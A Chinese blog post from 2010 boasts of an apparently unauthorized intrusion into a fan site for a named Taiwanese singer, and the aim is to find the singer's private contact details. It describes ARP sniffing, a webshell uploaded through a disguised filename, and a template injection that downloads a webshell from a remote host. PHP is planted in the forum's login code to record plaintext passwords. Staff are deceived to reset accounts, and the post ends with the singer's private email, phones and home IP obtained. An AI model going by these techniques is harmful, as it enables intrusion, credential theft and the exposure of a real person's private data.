分类

学习笔记 [17]
渗透测试 [4]
一些杂文 [14]
coding [16]
漏洞信息 [17]
技术文章 [15]
开发文档 [8]
个人作品 [5]
PS:个人作品在各种下载栏目均有下载

站内搜索

日历

«  February 2010  »
Su Mo Tu We Th Fr Sa
 123456
78910111213
14151617181920
21222324252627
28

友情链接

  • 莫良博客
  • 冷夜博客
  • 八神博客
  • Tm3yShell7
  • 2idy电影网
  • Blueandhack's Blog
  • 幻泉博客
  • 羽蛇
  • Elaf
  • 小冰's Blog

    • 访问统计(起于2010/10/2)

    访问统计
    PortWatcher's Blog
    Monday, 2025-06-30, 4:09 AM
    Welcome Guest
    Main | Registration | Login | RSS

    Blog

    Main » 2010 » February » 11 » 对王心凌的一次渗透过程
    9:43 PM
    对王心凌的一次渗透过程

    Author:Mars
    前几天,听说Cyndi出新专辑了,哥好激动啊..听了几天Music.突然萌发了个思想!想了解更多的有关于她的资料.下面一出好戏即将上演!
    总共有三个步骤 :1.先分析 2.再踩点 3.最后渗透
    拿到一个目标要先学会分析,首先Cyndi是位明星,所以利用搜索引擎是不可能搜索到什么有价值的信息.
    一般明星在网络上都有自己的Fans基地,好吧.目标已经确定了!
    通过百度搜索到一个她留言过的Fans基地http://www.cyndifans.net/
    既然目标确定了,该执行第二步了.去ip.3est.com 反查询一下它所在的服务器上还有其他站点没!查询结果如下:


     大概看了下,基本都采用Dz7.0+Uchome+SiteSuper7.5 组合!
    手里又没0day.所以没抱有太大希望.只好采用ARP方式来看看能获得什么有价值的信息,首先得先获得C段一台服务器权限,
    拿出平时常用的Hscan 来扫描一下有C段没有Ftp弱口令.
    悲剧了!竟然一个没扫出来.接着用IIS利用工具扫描下C段.记录装有IIS6.0的服务器IP
    因为他的IP是xx.xx.xx.154 大多数情况是1或者129作为网关,叫前C段和后C段,154距离129比较,所以目标放在129-255之间!
    然后进入cn.bing.com输入ip:xx.xx.xx.xx 搜索下后C段装有IIS6.0的服务器IP 看看有什么站.一般各类型网站多的的就是虚拟主机,排除掉这些,
    就剩下2台主机了..汗 真郁闷..那么集中精力看看其中一台xx人才网,wwwscan扫描下没扫描到有价值东西,进入网站转悠了半天,
    在他的分站点了个图片属性,路径是ewe我猜想了下应该是Ewebeditor这个编辑器,输入ewe/admin/admin_login.asp 发现后台被删了,
    数据库是默认的先下载下来看看有没有被人搞过,结果失望了.运气不怎么好..先休息下再搞了..去群里聊了会天
    过几个小时,来了精神.继续在它的网站转悠,我觉得问题最多的还是上传的地方,就注册了个会员.进入管理中心没有发现什么上传的位置,
    接着又注册了个企业会员.发现了个上传企业照片的地方.把小马改成1.asp;.jpg格式结果上传成功了.没提示路径.用抓包工具看一下.
    总算见到可爱的小马..拿到webshell之后,开始提权,结果那破服务器慢的要死.开个高速VPN,速度果然提升了.随便看了下感觉提权无望.
    .基本组建都被卸载了.目录还不能查看.有SU不过是9.1版本没溢出漏洞.唉 权限配置的很死.看来管理员挺懂安全啊.看了下配置文件最后发现个sa,
    哈哈 激动死了!直接加系统用户拿到服务器权限.然后更变态的事情发生了.进去看任务管理器竟然CPU100%总共运行72个进程..
    我的天啊…这么破烂的服务器一ARP不就挂掉了.我一个一个把没用的进程结束掉.到30个进程了.在结束服务器就挂了.
    然后打开我的电脑管理想看看这服务器是什么高级配置.结果点了属性Shell32.dl被禁,进C盘弹出拒绝访问..打开网页不让下载东西..
    一系列的问题皆然发生!终于把Cain放到服务器了.还好不出我所预料.这个服务器网关是129. 哈哈只能扫到后C段的服务器Mac .
    然后开始ARP 154这个主机,嗅探开始了.他服务器装有ARP防火墙软件把发送的数据给拦截了..
    这时候想起玫瑰的ARP突破方法,结果试验了下没成功,后来配合幻境网盾用了下.成功欺骗突破防火墙.终于嗅探到数据了,
    挺高兴的.结果5秒钟都没,Cain卡爆了!服务器挂了10分钟我才登录上.发现嗅探到的3万多个Http信息竟然都是盛大传奇的,
    我纳闷了会,地址确实是盛大的!
    看了下mssql嗅探到了几个SA密码.接着又拿下一台速度比较好点的服务器.接着刚才的工作.开始ARP.
    我在网站找到管理员的QQ加了他.!
    我说:
    你好!请问你是cyndifans.net的管理么 ?
    NiKai:

    我说
    我的账户丢失了怎么办 能帮我找回下么 ?
    NiKai:
    请问你用户名是?
    我说:
    christa
    NiKai :
    请使用找回密码功能http://www.cyndifans.net/logging.php?action=login
    我说:
    我以前的电子邮件过期了.
    NiKai:
    能否告诉我你的注册时间和最后登录时间?
    我说:
    记不起来了。。
    NiKai:
    大概的
    NiKai:
    还有电子邮件地址是什么?
    NiKai:
    邮件地址
    我说:
    以前注册的christa@163.com好像是163还是126..记不大清楚了!
    NiKai:
    什么时候发现不能登录或者发现忘记密码的?
    我说: (PS:其实我啥信息没有!去论坛看见个账户就随便说的.快露馅 该转移话题了!)
    对了!请问那个会员卡有什么作用 ? 能了解心凌最新消息?
    NiKai :
    凌盟永久会员
    可以通过短信等方式获取最新消息
    以及更多特权和购买专辑等优惠
    还有参与活动等优先权
    我说:
    哦~没什么别的待遇么。。能得到签名么
    NiKai
    预购专辑有签名啊
    NiKai
    重置密码为:123456 登录后尽快修改密码!
    我说(PS:哈哈 像想让我快点加入会员!我就不加气死你!)
    嗯 麻烦你了
    NiKai
    你要买吗?会员卡 年后会提价年后价格应该在50-68元之间!
    我说
    我没办理网上银行。。
    NiKai
    可以银行转账
    NiKai
    我可以给你账号
    我说
    嗯,好的!
    NiKai
    中国工商银行上海市新灵路支行
    受款帐号:10011XXXXX21135XXXX
    户名:XXX
    http://www.xxx.com/abouts/payment.php
    银行汇款(到账时间部分实时,部分1-5工作日)
    我说
    好的 我打的时候联系下你
    NiKai
    好的!
    我说
    麻烦了。
    成功嗅探到管理员的登录密码.接着进入后台,

    在模板任意位置插入
    {eval copy('http://www.3est.com/mars.txt', DISCUZ_ROOT.'./forumdata/shell.php');
    然后更新缓存.结果他的缓存目录竟然无写入权限…

    没办法了
    在后台查看了Cyndi的注册资料和最后登录IP地址.IP138查一下是台湾的.这差不多就是她家IP了.光拿到这个还不够,继续渗透…主要是拿Cyndi的密码,那只有Webshell或者服务器权限的情况下才能拿下数据库.这是一件比较难的差事.ARP到3389登录密码成功率很低的.只嗅探Ftp Mysql RDP ,过了2天嗅探出FTP了

    成功登录FTP之后,传个webshell

    结果服务器权限很死,ping 下是su8的FTP
    然后通过 空虚浪子心写的EXP提到服务器!
    然后BT的事情出现了。

    C盘没访问权限,打开属性提升用户组

    这个服务器安全做的不错,一堆东西没权限运行。# t2 z2 `- Z* s& f

    既然这样,在看看注册表是否被封锁了。什么都不让下载,更别说复制了。
    只能靠WebShell上传个cmd.exe来克隆下超级管理


     
    至此,第一阶段渗透完毕!

    去数据库找王心凌密码,DZ采用的是salt方式,随机获得一个字符串,然后把明文密码MD5之后,再与随机字符串连接起来之后,再次MD5。
    这样可极大的提高安全系数。
    只好在记录明文密码了。
    修改uc_client目录下的client.php 在
    function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
    下加入如上代码,在网站admin目录下生成include.txt
    $ip=$_SERVER['REMOTE_ADDR'];
    $showtime=date("Y-m-d H:i:s");
    $record="".$username." --------".$password." IP:".$ip." Time:".$showtime."\r\n";
    $handle=fopen('./admin/include.txt','a+');
    $write=fwrite($handle,$record);

    等着王心凌上论坛。
    下面做其他工作。
    先抓取下管理的Hash

    跑出密码!
    继续把服务器数据库连接密码,缓存密码,FTP密码都收集下!
    去ip866查询域名的注册邮箱是xx@yahoo.cn,然后反查下出现了Cyndi.com.cn这个域名,让我感到激情了。先看看他域名注册的地方,
    一个是新网,一个是万网,先解决新网的,百度搜索了下他的信息很散,不过经过一下午的搜索基本信息已经确定。

    接着试了几个密码进来了。

    很快,把所有密码整理下,然后猜想下就出来了。

    继续搜索资料,找DNS管理页面

    然后社工到QQ密码,然后进入QQ网络硬盘,找有价值信息,成功拿到cyndi.com.cn管理权限。
    经过收集资料,在百度贴吧找到她ID,搜狐BLOG 台湾雅虎BLOG
    经过调查发现那个搜狐BLOG是她的经纪人帮她发的,
    只有翻墙去台湾BLOG,

    收集了点资料,
    1、起初为了社工心凌创办的经济公司的EMAIL,依靠的是雅虎订阅信息得到EMAIL,然后通过找回密码,密码问题是她姓名,更何况我又不知道她是谁,与他们公司的关系及职位,我猜想,他们公司人数不会太多,估计也就两三个。
    2、百度找到他们公司电话,打过去,然后说,请问您的贵姓 接着一个女的说 ?好甜美的话语啊,我于是蠢蠢欲动了几秒,接着说,女士您贵姓,她说姓米,我说 米小姐,请问怎么能够拿到心凌的签名,她给我了个电话让我联系一个唱片公司。接着挂电话了
    3、过半天之后 再打电话给她经济公司,说请问张XX小姐在么?
    4、我听了语音,是另外个女的接的电话,她说请问你是不是找张小姐,接着找个借口挂了电话!
    5、然后登录Email通过密码提示找回密码,输入姓名,成功进入!
    进入邮箱打开通讯录,拿到了本人的手机,王心凌的私人EMAIL和手机,然后这个密码正好是她EMAIL的。。就不截图了,免的被人破坏。
    渗透结束!有时间找她聊聊哈。
    Category: 渗透测试 | Views: 1263 | Added by: Jury | Rating: 5.0/1
    Total comments: 0
    Name *:
    Email *:
    Code *:

    admin@portwatcher.net |